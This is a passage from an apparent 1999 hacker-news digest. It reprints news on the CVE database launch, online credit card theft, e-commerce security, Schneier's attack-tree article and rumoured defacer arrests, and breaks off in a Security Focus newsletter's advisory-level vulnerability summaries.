      creating formats for the African-American
      community, such as the adult R&B of Kiss
      104.7 and the contemporary gospel of
      Glory 1340 AM. However, some have
      raised questions as to whether white
      management is politically or socially
      motivated. 
      
      Ryan Cameron, morning man at rap station
      Hot 97.5, wonders whether Midwestern will
      take the new station into the community as
      much as he or Ski do with their shows. 
      
      "Anything that's going to make the market
      more interesting is definitely a plus,"
      Cameron said. "It's great to raise issues
      and talk, but how visible will they be? 
      
      It's not like they got new owners. I'll be
      curious to see how much involvement there
      will be in the community other than
      monetary." 
      
      Dickey doesn't believe that a black
      news/talk station with white ownership will
      cripple its chances of success. 
      
      "Race has nothing to do with it, it just
      makes good economic sense," he said. 
      
      "Sure, we're trying to make a buck off this.
      But more important, we've been able to
      provide a choice for African American
      listeners in Atlanta. 
      
      As a broadcaster, it's my responsibility to
      research the market and find the
      opportunties that are there. We have two
      well established radio stations in Kiss and
      Glory, and this is an extension of that niche.
      
      I don't care if you're white, black, Chinese,
      male, famale, young or old, it doesn't make
      sense to go up against established
      stations like WSB or WGST. [A black
      news/talk station] complements our
      package. 
      
      We can cross-promote each station with
      the other two. We can utilitze people who
      appear on one and put them on the other." 
      
      The transaction does not involve the sale of
      680 AM, rather a switch in who is calling
      the shots about what is on the air. For five
      years, Midwestern Broadcasting, which
      owns the frequency, has leased 680 AM to
      Cox Radio, owner of news/talk giant
      WSB-AM (750). 
      
      Cox Radio has spearheaded
      programming, first as a sports-talk station
      (680/The Fan), then turning WCNN into a
      news/talk station in 1997. The lease
      between the two companies expires April
      2. 
      
      According to Marc Morgan, co-chief
      operating officer of Cox Radio, the
      decision to end the arrangement was
      mutual. 
      
      "When we made this [leasing] deal five
      years ago, it made great sense at the time
      and served the purpose it was meant to
      serve," he said. "There's definitely a hole in
      the market for a black talk station, and I
      think it's a good idea. ... I haven't heard it
      yet, so I couldn't even begin to speculate on
              what effect, if any, it would have on any
              other station in town."      

                            
      @HWA
      
18.0  CVE by Mitre Goes Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The Common Vulnerabilities and Exposures database run
      by Massachusetts defense contractor Mitre has gone
      online. The database hopes to help standardize
      computer security terms and set a common vocabulary
      for building more secure systems. The database hopes
      to contain all known system vulnerabilities. (It is unlikely
      that any of the big 5 security companies will give up
      new vulnerabilities that only they know about for their
      competitors to find in this database. The database is
      already missing some key advisories that have been
      publicly released.) 

      The Boston Globe
      http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml
      
      Common Vulnerabilities and Exposures Database 
      http://www.cve.mitre.org/
      
      Handle on hackers 

      Bedford firm seeks security standard with
      software-weakness list
 
      By Ross Kerber, Globe Staff, 12/01/99 
 
         BEDFORD - Before the invention of the periodic table in 1869, chemists
          struggled to put elements such as hydrogen and lithium into a coherent
      classification scheme.
 
      Today, parts of the field of computer science now seem stuck with the same
      lack of organization. In particular there is little agreement among software
      security specialists on just how to classify the sections of computer code that
      are often targeted by hackers.
 
      Government and academic groups have attempted to categorize these
      software Achilles' heels for years, to little commercial enthusiasm.
 
      But now some steam is gathering behind a project run by Bedford-based
      Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try
      to classify codes and other security problems into families or types, but only
      to list them as part of what Mitre calls a directory of ''Common Vulnerabilities
      and Exposures.''
 
      By dumbing down its directory, known as the CVE, Mitre has persuaded 23
      organizations including Cisco Systems Inc. and IBM Corp. to participate. The
      result can be found on line at www.cve.mitre.org, and executives hope it will
      help standardize terms and set a common vocabulary for building more secure
      systems.
 
      ''The beauty of the approach we've taken is to avoid everybody arguing''
      about complicated categorizations, said Steven Christey, a software engineer
      at Mitre, a nonprofit government contractor.
 
      His colleague, David Mann, compares the CVE to the lists of individual
      elements that were drawn up long before the periodic table was accepted.
      ''To get things going scientifically we really need to start small,'' Mann said.
      ''Hopefully it will spawn more categorizations, eventually.''
 
      While software viruses are quickly studied and named, the security
      weaknesses they attack vary widely and are far more difficult to classify.
 
      Consider the various names given for a type of code used by many Web sites
      known as the ''common gateway interface,'' or cgi, generally used to connect
      the site to on-line sources such as telephone directories.
 
      Altering such code can cause big disruptions to the sites, a weakness known
      as ''CA-96.06.cgi-example
 
      code'' by CERT, a well-known computer-security center at Carnegie Mellon
      University. Meanwhile CyberSafe Corp., an Internet security firm based in
      Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.''
 
      While both continue to use those names, they also have begun to include in
      their advisories the name chosen by Mitre for the condition:
      ''CVE-1999-0067,'' meaning that the problem was the 67th identified under
      the CVE effort this year.
 
      Eventually they might drop their own terminologies altogether, said Bill Fithen,
      a CERT security analyst. ''If CVE catches on, there might truly be no
      legitimate reason to continue'' using older names, he said.
 
      For Mitre, CVE represents a chance to show off the commercial benefits of
      its work for government agencies. Founded in 1958 by a group of
      researchers formerly associated with MIT's Lincoln Laboratories, Mitre has
      chiefly been known as a contractor on aerospace and classified military
      projects, with offices from Fort Leavenworth, Kan., and Washington, D.C.,
      to Seoul.
 
      The company also has branched out into the civilian sector and now runs
      research centers for the Federal Aviation Administration and the Internal
      Revenue Service. In 1996 Mitre spun off divisions that did research in space,
      environment, and telecommunications. It still has about 4,000 employees
      worldwide and reported revenue of $542 million for its latest fiscal year.
 
      At the behest of the Pentagon, Mitre several years ago began research in
      areas of ''critical infrastructure protection''; 15 of the company's employees
      now are involved in a FBI anti-hacking center in Washington, D.C.
 
      The CVE is rooted in such work, dreamed up by Mann after he was assigned
      last year to create a database to protect the company's computers.
 
      Mann wanted to automatically compare alerts issued by CERT and other
      security groups with an analysis of traffic on Mitre's computers, but Mitre's
      programmers were using different terms. ''I realized we needed a way to put
      these things together,'' said Mann, 37, who holds a doctorate in mathematics
      and once taught at a US Navy postgraduate program in California.
 
      Mann developed the idea with Christey, 32, a senior software engineer, and
      last January they presented a paper at a conference at Purdue University in
      Indiana, sparking broader commercial interest.
 
      Now many attendees of that conference are members of CVE's 25-member
      editorial board made up of software vendors, analysts, and academics, and
      headed by Christey. So far the group has agreed to assign numbers to about
      320 vulnerabilities, and hopes to get to 665 by the end of the year.
 
      Like many business consortiums, the CVE board also includes members who
      aren't so enthusiastic. Some worry their competitors will learn their secrets.
 
      ''CVE will only contain vulnerabilities that are old or not interesting,'' said
      Marcus Ranum, chief executive of closely held Network Flight Recorder in
      Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an
      employee to join the CVE board, which holds conference calls periodically to
      discuss new entries. But the board member won't give away too much,
      Ranum says.
 
      ''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make
      CVE useful I'd give all my information to CVE. But then my competitors
      would have it and my shareholders would kill me.''
 
      But other CVE participants say they hope the list will demystify their work to
      corporate customers and boost sales.
 
      ''Generally people can get pretty confused when you try to sell them
      software,'' said Andre Frech, a researcher at Internet Security Systems in
      Atlanta, which recently began including CVE numbers in a detection
      database.
 
      Internet Security Systems' founder, Christopher Klaus, says the CVE might
      someday even become the basis of ''hacker insurance'' policies for companies
      to minimize the impact of technical disruptions. Without CVE or something
      like it, he said, ''it would be hard even to set the premiums ... because people
      couldn't be specific enough about what they might be selling.''
 
      If CVE catches on, it will please specialists who have tried to develop more
      complex classification schemes with little notice, like Eugene Spafford, a
      computer scientist at Purdue who ran the conference where Mann and
      Christey first presented their paper.
 
      Four years ago Spafford began building his own open database of computer
      security flaws, but found few companies could agree on organizing criteria. In
      contrast, he said, CVE has already achieved ''a lot more buy-in than has
      happened in the past.''
 
      This story ran on page C01 of the Boston Globe on 12/01/99. 
       Copyright 1999 Globe Newspaper Company. 
      
      @HWA
      
      
19.0  Novell Head Victim of Online Credit Card Theft 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

      contributed by Weld Pond 
      Novell chief Eric Schmidt has admitted that he has been
      the victim of credit card theft. Speaking at San
      Francisco's Digital Economy conference he blamed the
      theft of his personal information on browser cookies. He
      labeled cookies as "the biggest disaster for computers in
      the past [few] years." 

      ZD Net       
      http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop
      
      Novell chief's credit card stolen online

      Eric Schmidt blames cookies for cyber theft --
      calls cookies 'one of the biggest disasters for
      computers.'
      
      
      
      By Ben Elgin, Sm@rt Reseller
      UPDATED December 2, 1999 3:26 PM PT 
      
      
      Novell chief Eric Schmidt knows firsthand the
      problem of Internet fraud. 
      
      Speaking at San Francisco's Digital Economy conference
      Thursday, Schmidt informed the crowd that his credit card
      number had been stolen over the Internet in the past. 
      
      Although he isn't sure exactly how his card number was
      lifted, Schmidt says he believes it was through a
      mechanism that reads the cookies-files sitting on a user's
      desktop and storing personal information, such as
      passwords and preferences. 
      
      "Cookies are one of the biggest disasters for computers in the
      past [several] years," says Schmidt, citing the lack of
      security and the blatant breach of consumer privacy. 
      
                       As Novell's chairman and CEO,
      Schmidt is trying to oust cookies with his company's new
      "digitalme" online identification-management service.
      Based on Novell Directory Services technology, digitalme
      is aiming to store and consolidate a user's multiple
      passwords, address books, favorites lists and purchasing
      preferences. 
      
      "Cookies are a great idea, [but] they are just stored in the
      wrong place," says Schmidt. 
      
      Schmidt's brush with cyber thieves may have left him
      wary, but not a whole lot poorer. "My liability was $50 ...
      [but] I'm not sure what the credit card company's liability
      was." he says
      
      @HWA


20.0  IDC Says E-Commerce Unsafe Most of the Time 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Deepquest 
      The most recent Technology Integration Panel Study,
      conducted by International Data Corporation paints a
      grim picture of online security. Consumers have worried
      about the security of their online transactions, and this
      study seems to justify those fears. The study, entitled
      E-Commerce Solutions: Customer Directions and
      Segmentation by Company Size and Industry" explores
      various market segments currently using e-commerce
      systems and what the potential is for the future.
      (Unfortunately the data for this study is already six
      months old and had an extremely small sample size.
      Hopefully a more comprehensive study can be
      conducted soon.) 

      South China Morning Post 
      http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main
      
      Published on Thursday, December 2, 1999
 
      ENTERPRISE 
 
       Online transactions are
      not all secure, says study 
 
      NEWSBYTES 
 
      Consumers have worried about the security of their
      online transactions, and a new study by International
      Data Corporation (IDC) justifies their fears.
 
      According to IDC's most recent Technology Integration
      Panel Study, one in five large companies (those having
      1,000 or more employees) is likely not to have a secure
      transaction option available. In small companies, (10-99
      employees) the ratio of firms not having a secure
      transaction option rises to one in three.
 
      "Information technology is again changing the business
      landscape, offering the potential for better products and
      services delivered to corporations, governments, and
      consumers alike through the engineering of e-solutions,"
      said Carey Azzara, program director of IDC's
      "Corporate Computing: Vertical Views" research.
 
      "However, realising this potential is not easy and
      certainly not without pitfalls for the vendors trying to
      bring the world into this new paradigm."
 
      Mr Azzara emphasised the point that unless companies
      have a secure means of accepting payment for a
      transaction, whether that transaction is e-retail or
      business-to-business, they are not engaging in
      e-commerce; rather, they are engaging in e-business,
      which is not the same. 
 
      "I will pick a secure server all the time," Mr Azzara said
      when discussing how payment is be made online. Under
      no circumstances, he cautioned, should credit card
      numbers be given in a non-secure environment.
 
      In fact he would not accept a secure-transaction logo on
      a Web site, but would make sure that the online
      merchant's server was really secure with encryption and
      authentication capabilities. 
 
      Over 40 per cent of the survey's respondents reported
      that they paid a premium for better e-commerce system
      performance. The study found Microsoft had the largest
      hold on the market, but Netscape, IBM, and Oracle
      were seriously considered by 25 per cent of the
      responding companies.
 
      The full study, entitled "E-Commerce Solutions:
      Customer Directions and Segmentation by Company
      Size and Industry", explores the market segments
      currently using e-commerce systems and how the
      potential for future business is shaping up.
 
      The study, conducted during July 1999, sampled 974
      US and Canadian companies, stratified by size and
      industry, and was weighted to reflect information and
      communication technology of each marketplace.
 
      Mr Azzara said consumers should "go ahead, make the
      phone call" when passing over credit card information
      unless the security of the site was established.
 
      The message of the survey, he said, is: "Buyer beware!
      Don't be a victim."
 
      Additional information about IDC is available at
      www.idc.com. 
 
      Copyright (c) Post-Newsweek Business Information, Inc.
      All rights reserved.
      
      @HWA
      
21.0  Attack Trees Help to Model Security Threats 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      With new security weakness showing up on a daily basis
      how do you model threats against computer systems?
      Bruce Schneier has come up with a formal methodology
      for analyzing the security of systems and subsystems,
      known as 'Attack Trees'. 

      Dr. Dobb's Journal       
      http://www.ddj.com/articles/1999/9912/9912a/9912a.htm
      
       
      Attack Trees

      Dr. Dobb's Journal December 1999

      Modeling security threats

      By Bruce Schneier

      Bruce is the CTO of Counterpane Internet Security, author of Applied 
      Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of 
      the Blowfish and Twofish encryption algorithms. You can contact Bruce at 
      http:// www.counterpane.com/. 


      Few people truly understand computer security, as illustrated by 
      computer-security company marketing literature that touts "hacker proof 
      software," "triple-DES security," and the like. In truth, unbreakable 
      security is broken all the time, often in ways its designers never 
      imagined. Seemingly strong cryptography gets broken, too. Attacks thought 
      to be beyond the ability of mortal men become commonplace. And as 
      newspapers report security bug after security bug, it becomes increasingly 
      clear that the term "security" doesn't have meaning unless also you know 
      things like "Secure from whom?" or "Secure for how long?"

      Clearly, what we need is a way to model threats against computer systems. 
      If we can understand all the different ways in which a system can be 
      attacked, we can likely design countermeasures to thwart those attacks. 
      And if we can understand who the attackers are -- not to mention their 
      abilities, motivations, and goals -- maybe we can install the proper 
      countermeasures to deal with the real threats.

      Enter Attack Trees

      Attack trees provide a formal, methodical way of describing the security 
      of systems, based on varying attacks. Basically, you represent attacks 
      against a system in a tree structure, with the goal as the root node and 
      different ways of achieving that goal as leaf nodes.

      Figure 1, for instance, is a simple attack tree against a physical safe. 
      The goal is opening the safe. To open the safe, attackers can pick the 
      lock, learn the combination, cut open the safe, or install the safe 
      improperly so that they can easily open it later. To learn the 
      combination, they either have to find the combination written down or get 
      the combination from the safe owner. And so on. Each node becomes a 
      subgoal, and children of that node are ways to achieve that subgoal. (Of 
      course, this is just a sample attack tree, and an incomplete one at that. 
      How many other attacks can you think of that would achieve the goal?)

      Note that there are AND nodes and OR nodes (in the figures, everything 
      that isn't an AND node is an OR node). OR nodes are alternatives -- the 
      four ways to open a safe, for example. AND nodes represent different steps 
      toward achieving the same goal. To eavesdrop on someone saying the safe 
      combination, attackers have to eavesdrop on the conversation AND get safe 
      owners to say the combination. Attackers can't achieve the goal unless 
      both subgoals are satisfied.

      That's the basic attack tree. Once you have it completed, you can assign 
      values -- I (impossible) and P (possible) in Figure 1 -- to the various 
      leaf nodes, then make calculations about the nodes. (Again, this is only 
      an illustrative example; do not take the values as an indication of how 
      secure my safe really is.) Once you assign these values -- presumably this 
      assignment will be the result of painstaking research on the safe itself 
      -- you can calculate the security of the goal. The value of an OR node is 
      possible if any of its children are possible, and impossible if all of its 
      children are impossible. The value of an AND node is possible only if all 
      children are possible, and impossible otherwise; see Figure 2.

      The dotted lines in Figure 2 show all possible attacks -- a hierarchy of 
      possible nodes, from a leaf to the goal. In this sample system, there are 
      two possible attacks: Cutting open the safe, or learning the combination 
      by bribing the owner of the safe. With this knowledge, you know exactly 
      how to defend this system against attack.

      Assigning "possible" and "impossible" to the nodes is just one way to look 
      at the tree. Any Boolean value can be assigned to the leaf nodes and then 
      propagated up the tree structure in the same manner: easy versus 
      difficult, expensive versus inexpensive, intrusive versus nonintrusive, 
      legal versus illegal, special equipment required versus no special 
      equipment. Figure 3 shows the same tree with another Boolean node value.

      Assigning "expensive" and "not expensive" to nodes is useful, but it would 
      be better to show exactly how expensive. It is also possible to assign 
      continuous values to nodes. Figure 4 shows the tree with different costs 
      assigned to the leaf nodes. Like Boolean node values, these can propagate 
      up the tree as well. OR nodes have the value of their cheapest child; AND 
      nodes have the value of the sum of their children. In Figure 4, the costs 
      have propagated up the tree, and the cheapest attack has been highlighted.

      Again, this tree can be used to determine where a system is vulnerable. 
      Figure 5 shows all attacks that cost less than $100,000. If you are only 
      concerned with attacks that are less expensive (maybe the contents of the 
      safe are only worth $100,000), then you should only concern yourself with 
      those attacks. 

      There are many other possible continuous node values, including 
      probability of success of a given attack, likelihood that an attacker will 
      try a given attack, and so on.

      Nodes and Their Values

      In any real attack tree, nodes will have many different values 
      corresponding to many different variables, both Boolean and continuous. 
      Different node values can be combined to learn even more about a system's 
      vulnerabilities. Figure 6, for instance, determines the cheapest attack 
      requiring no special equipment. You can also find the cheapest low-risk 
      attack, most likely nonintrusive attack, best low-skill attack, cheapest 
      attack with the highest probability of success, most likely legal attack, 
      and so on. Every time you query the attack tree about a certain 
      characteristic of attack, you learn more about the system's security.

      To make this work, you must marry attack trees with knowledge about 
      attackers. Different attackers have different levels of skill, access, 
      risk aversion, money, and so on. If you're worried about organized crime, 
      you have to worry about expensive attacks and attackers who are willing to 
      go to jail. If you are worried about terrorists, you also have to worry 
      about attackers who are willing to die to achieve their goal. If you're 
      worried about bored graduate students studying the security of your 
      system, you usually don't have to worry about illegal attacks such as 
      bribery and blackmail. The characteristics of your attacker determine 
      which parts of the attack tree you have to worry about.

      Attack trees also let you play "what if" games with potential 
      countermeasures. In Figure 6, for example, the goal has a cost of $20,000. 
      This is because the cheapest attack requiring no special equipment is 
      bribing the person who knows the combination. What if you implemented a 
      countermeasure -- paying that person more so that he is less susceptible 
      to bribes? If you assume that the cost to bribe him is now $80,000 (again, 
      this is an example; in the real world you'd be expected to research 
      exactly how a countermeasure affects the node value), then the cost 
      increases to $60,000 (presumably to hire the thugs to do the threatening).

      A PGP Example

      Figure 7 is an attack tree for the popular PGP e-mail security program. 
      Since PGP is a complex program, this is a complex tree, and it's easier to 
      write it in outline form than graphically. PGP has several security 
      features, so this is only one of several attack trees for PGP. This 
      particular attack tree has "read a message encrypted with PGP" as its 
      goal. Other goals might be: "forge someone else's signature on a message," 
      "change the signature on a message," "undetectibly modify a PGP-signed or 
      PGP-encrypted message," and so on.

      What immediately becomes apparent from the attack tree is that breaking 
      the RSA or IDEA encryption algorithms are not the most profitable attacks 
      against PGP. There are many ways to read someone's PGP-encrypted messages 
      without breaking the cryptography. You can capture their screen when they 
      decrypt and read the messages (using a Trojan horse like Back Orifice, a 
      TEMPEST receiver, or a secret camera), grab their private key after they 
      enter a passphrase (Back Orifice again, or a dedicated computer virus), 
      recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back 
      Orifice), or simply try to brute force their passphrase (I can assure you 
      that it will have much less entropy than the 128-bit IDEA keys that it 
      generates). In the scheme of things, the choice of algorithm and the key 
      length is probably the least important thing that affects PGP's overall 
      security. PGP not only has to be secure, but it has to be used in an 
      environment that leverages that security without creating any new 
      insecurities.

      Creating Attack Trees

      How do you create an attack tree like this? First, you identify the 
      possible attack goals. Each goal forms a separate tree, although they 
      might share subtrees and nodes. Then, try to think of all attacks against 
      each goal. Add them to the tree. Repeat this process down the tree until 
      you are done. Give the tree to someone else, and have him think about the 
      process and add any nodes he thinks of. Repeat as necessary, possibly over 
      the course of several months. Of course there's always the chance that you 
      forgot about an attack, but you'll get better with time. Like any security 
      analysis, creating attack trees requires a certain mindset and takes 
      practice.

      Once you have the attack tree, and have researched all the node values 
      (these values will change over time, both as attacks become easier and as 
      you get more exact information on the values), you can use the attack tree 
      to make security decisions. You can look at the values of the root node to 
      see if the system's goal is vulnerable to attack. You can determine if the 
      system is vulnerable to a particular kind of attack; password guessing, 
      for instance. You can use the attack tree to list the security assumptions 
      of a system; for example, the security of PGP might assume that no one 
      could successfully bribe the programmers. You can determine the impact of 
      a system modification or a new vulnerability discovery: Recalculate the 
      nodes based on the new information and see how the goal node is affected. 
      And you can compare and rank attacks -- which is cheaper, which is more 
      likely to succeed, and the like.

      One of the surprising things that comes out of this kind of analysis is 
      that the areas people think of as vulnerable usually aren't. With PGP, for 
      example, people generally worry about key length. Should they use 1024-bit 
      RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the 
      key length of RSA doesn't really matter. There are all sorts of other 
      attacks -- installing a keyboard sniffer, modifying the program on the 
      victim's hard drive -- that are much easier than breaking the RSA public 
      key. Increasing the key length from 1024 bits to 2048 bits is like putting 
      an enormous stake into the ground and hoping the enemy runs right into it, 
      as opposed to building a lower palisade around the target. Attack trees 
      give you perspective on the whole system.

      One of the things that really makes attack trees valuable is that they 
      capture knowledge in a reusable form. Once you've completed the PGP attack 
      tree, you can use it in any situation that uses PGP. The attack tree 
      against PGP becomes part of a larger attack tree. For example, Figure 8 
      shows an attack tree whose goal is to read a specific message that has 
      been sent from one Windows 98 computer to another. If you look at the root 
      nodes of the tree, the entire attack trees for PGP and for opening a safe 
      fit into this attack tree.

      This scalability means that you don't have to be an expert in everything. 
      If you're using PGP in a system, you don't have to know the details of the 
      PGP attack tree; all you need to know are the values of the root node. If 
      you're a computer-security expert, you don't have to know the details 
      about how difficult a particular model of safe is to crack; you just need 
      to know the values of the root node. Once you build up a library of attack 
      trees against particular computer programs, door and window locks, network 
      security protocols, or whatever, you can reuse them whenever you need to. 
      For a national security agency concerned about compartmentalizing attack 
      expertise, this kind of system is very useful.

      Conclusion

      Attack trees provide a formal methodology for analyzing the security of 
      systems and subsystems. They provide a way to think about security, to 
      capture and reuse expertise about security, and to respond to changes in 
      security. Security is not a product -- it's a process. Attack trees form 
      the basis of understanding that process.

      DDJ
      
      @HWA
      
22.0  Pandora Updated 
      ~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad 
      Jitsu-Disk finished moving the Pandora Linux code so
      that Pandora Linux uses libpcap and libnet. Pandora is a
      set of tools for testing the security and insecurity of
      Novell Netware. A number of problems have been
      corrected from the beta release on November 19th,
      including several problems involving spoofing and
      sniffing. Libnet helped Jitsu fix all that. The
      documentation has also been updated, including all the
      code used to do the builds, and pre-compiled binaries,
      all wrapped up in a nice big tarball. 

      Nomad Mobile Research Center       
      http://www.nmrc.org/pandora/
      
      @HWA    
      
23.0  [sSh] Busted or Not?  
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Ender 
      Numerous contradictory information about the raids and
      arrests of YTCracker and Darkness of [sSh] have been
      received by HNN and other sources. It is pretty clear at
      this time that YTCracker has not been arrested, yet.
      (He feels that it is only a matter of time.) OSALL has
      been trying to keep track on the rumors and innuendoes
      and get accurate information regarding this breaking
      story or non-story. 

      OSALL       
      http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html
      
      
      [sSh] Busts
      12/02/99

                                                    Mike Hudack
                                                  Editor-in-Chief

      Note: The following information is presented as best as possible. 
      Contradictions have been streaming into the OSAll headquarters from two
      FBI agents, numerous Web site defacers and several other people.  All
      claim to know whats going on, but all contradict each other.  Were
      leaving this story intact for now, until the dust settles and we can determine
      the facts of the case, as it were.

      Correction: YTCracker has not been raided.

      OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he
      had not been raided by the FBI or any other government agency.  

      Previous reports published on OSAll and HNN stated that YTCracker
      had been raided, citing rumors and, in one case on OSAll, an anonymous
      FBI source.  It appears that these reports were incorrect.

      As of right now it has been confirmed that Darkness has been visited by
      NASA investigative authorities.  FBI visits have not been confirmed but
      have been mentioned by an anonymous FBI source.

      The validity and reliability of this FBI source is being called into question as
      more evidence comes to light.

      The source expects "a number of groups to fall soon" but gave no timeline
      or even a guarentee of further arrests.

      The FBI has already seized logs relating to a number of attacks, including
      visiting an ISP that one defacer funneled his attacks through.

      Both the FBI and US Attorneys Office have denied official comment on
      an "ongoing investigation."
      
      @HWA
      
24.0  Response to Freedom Extraordinary 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Jordan 
      Thursdays long anticipated launch of Freedom 1.0 by
      Zero Knowledge Systems has proved to be an
      extraordinary success. Freedom works seamlessly
      alongside your favorite browser and other Internet
      applications. You can surf the web, send email, chat,
      telnet, and participate in newsgroups as you normally
      would, only now with complete confidence that your
      personal information is not being collected without your
      consent. Freedom identifies you on the net with a 'nym'
      that you choose. There can be only one 'nym' so you
      may want to reserve your online identity as soon as you
      can. 

      Freedom 1.0      
      http://www.zks.net/clickthrough/click.asp?partner_id=542
      
      @HWA
      
      
      
25.0  DCypher.net Team Created 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by dcypher 
      A team for the Hacker News Network has been created
      at DCypher.net. DCypher.Net has accepted the CS
      Group's CS-Cipher challenge and will attempt to break
      their 56 bit key using a brute force attack in a
      distributed computing effort. They promise to give the
      entire $10,500 prize to whoever actually finds the
      correct key. (Now that is a pretty strong incentive.) 

      DCypher.net
      http://www.dcypher.net/
      
      HNN Stats at DCypher.net TeamID:131

      Don't forget about our team over at SETI@Home, the
      search for extraterrestrial life. 

      SETI@Home
      http://setiathome.ssl.berkeley.edu/
      
      HNN SETI@Home Team Stats 
      http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html
      
      @HWA
      
26.0  Hackers Make it to Mars 
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Desolationroad 
      At approximately 12 Noon PST on Friday December 3rd,
      1999 a 42 square foot (3.816 sq meters) extremely
      dense ball of complicated electronics will arrive at the
      end of its twelve month journey. The 1,270 pounds (576
      kg) mass of extremely sophisticated cutting edge
      technology will crash land onto the surface of an
      extraterestrial location. (Now thats a damn hack if I
      ever heard of one.) 

      Jet Propulsion Laboratory       
      http://marslander.jpl.nasa.gov/index.html
      
      @HWA
      
27.0  Security Focus Newsletter #17
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Security Focus Newsletter #17
      Table of Contents:
      
      I.   INTRODUCTION
      II.  BUGTRAQ SUMMARY
      1. NetTerm FTP Server Multiple Vulnerabilities
      2. Microsoft IE5 XML HTTP Redirect Vulnerability
      3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
      4. Vermillion FTPd CWD DoS Vulnerability
      5. Mdaemon WebConfig Overflow DoS Vulnerability
      6. Cabletron SSR ARP Flood DoS Vulnerability
      7. Netscape Navigator Long ASP Argument Vulnerability
      8. Deerfield WorldClient Long URL DoS Vulnerability
      9. SCO Xsco Buffer Overflow Vulnerability
      10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
      11. SCO su(1) Buffer Overflow Vulnerability
      III. PATCH UPDATES
      1. Vulnerability Patched: Linux syslogd Denial of Service
      2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service
      3. Vulnerability Patched: Cabletron SSR ARP Flood DoS
      4. Vulnerability Patched: SCO su(1) Buffer Overflow
      5. Vulnerability Patched:  Pine Environment Variable Expansion in
         URLS
      IV.  INCIDENTS SUMMARY
      1. Re: Port 137 and snmp scans (Thread)
      2. SunOS rpcbind scans (Thread)
      3. Re: cracker probing 1542 (Thread)
      4. Re: rpc logging (Thread)
      5. SANS and CERT ICMP advisories (Thread)
      6. Fw: unsolicited connection(s) (Thread)
      7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
      8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
      9. BIND Scanning (Thread)
      10. sweep (Thread)
      11. pop3/imap crawler.. (Thread)
      12. UK Law & Cases Re Malicious action/attacks (Thread)
      13. cgi attack
      14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
      15. Port 98 scans & new 3128/8080 scans
      V. VULN-DEV RESEARCH LIST SUMMARY
      1. Re: icq accounts (Thread)
      2. Re: WordPad/riched20.dll buffer overflow (Thread)
      3. SSH exploit (Thread)
      4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
      5. Re: development of wordpad exploit (Thread)
      VI.   SECURITY JOBS
         Seeking Staff:
      1. SecurityFocus.com is looking for staff writers for a Windows NT column!
      2. NYC - Internet Security Position
      3. Security Research Engineer
      VII.  SECURITY SURVEY RESULTS
      VIII. SECURITY FOCUS TOP 6 TOOLS
      1. SecurityFocus.com Pager (Win95/98/NT)
      2. Lookout (Windows 2000, Windows 95/98 and Windows NT)
      3. cgicheck99 0.4 (Any system supporting rebol)
      4. HookProtect (Windows 95/98 and Windows NT)
      5. Sun Enterprise Network Security Service Early Access 1 (Java)
      6. Pandora for Linux v4 beta 2 (Linux)
      IX. SPONSOR INFORMATION - CORE SDI
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      
      
      I.   INTRODUCTION
      -----------------
      
      Welcome to the Security Focus 'week in review' newsletter issue 17
      sponsored by CORE SDI.
      
      http://www.core-sdi.com
      
      II.  BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27
      ---------------------------------------------
      
      
      1. NetTerm FTP Server Multiple Vulnerabilities
      BugTraq ID: 819
      Remote: Yes
      Date Published: 1999-11-22
      Relevant URL:
      http://www.securityfocus.com/bid/819
      Summary:
      
      InterSoft's internet suite includes an FTP server which has been found to
      have numerous vulnerabilities. Among them:
      
      The default configuration allows read/write access to the root of the C:
      drive for anonymous users. This write access includes overwrite and
      delete. If the server is setup with 'out of the box' options, anonymous
      remote users have full access to the operating system files and
      executables.
      
      There is no administrator account, which means that any user with console
      access can alter the server's settings.
      
      The encryption method used on the passwords for user accounts is reported
      to be weak and easily broken.
      
      There are also multiple buffer overflows. Supplying over 1024-character
      arguments to the following commands will crash the server: dir, ls, mkdir,
      delete, and rmdir. Also, althouth the PASS buffer is truncated at 16
      characters for users with accounts, this limit is not in place for the
      anonymous user (to allow for proper entry of email addresses as passwords)
      and a 1024-byte string 'password' will crash the server if user name
      'anonymous' is supplied. It may be possible to exploit these overflows to
      run arbitrary code.
      
      
      2. Microsoft IE5 XML HTTP Redirect Vulnerability
      BugTraq ID: 815
      Remote: Yes
      Date Published: 1999-11-22
